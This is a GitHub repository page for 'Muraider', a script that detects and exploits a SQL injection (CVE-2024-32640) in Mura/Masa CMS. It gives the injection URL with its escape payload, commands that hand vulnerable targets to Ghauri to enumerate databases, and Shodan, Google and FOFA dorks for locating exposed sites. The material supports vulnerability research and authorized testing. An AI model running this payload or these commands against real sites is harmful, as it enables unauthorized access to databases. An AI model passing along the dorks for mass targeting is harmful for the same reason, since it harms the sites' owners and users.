Skip to content

Stuub/CVE-2024-32640-SQLI-MuraCMS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 

Repository files navigation

Muraider - Automating the detection & Exploitation of CVE-2024-32640 \ SQLi in Mura/Masa CMS

Usage

Detection:

python3 CVE-2024-32640.py --url https://target.com/

Ghauri Exploitation (Pass '-g' or '--ghauri' as argument):

Parse in any arguments that you wish to use with Ghauri, following their argument list:

python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Example

image

Ghauri SQLI Auotmation:

Using the detection that I've implemented into the tool, we can then use the vulnerable target to exploit in Ghauri. The script automates this process, parsing all the target information needed into a call to Ghauri.

image

Details

By appending an escape sequence (%5c) to the contenthisid HTML Query Parameter value, we're able to verify if a target is vulnerbale to this SQLi.

Successful exploitation could lead to unauthorized access to sensitive data.

URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x

Dorks

Shodan-query: 'Generator: Masa CMS'

Google: "powered by Mura CMS"

FOFA: app="Mura-CMS"

References:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835

Releases

No releases published

Packages

No packages published

Languages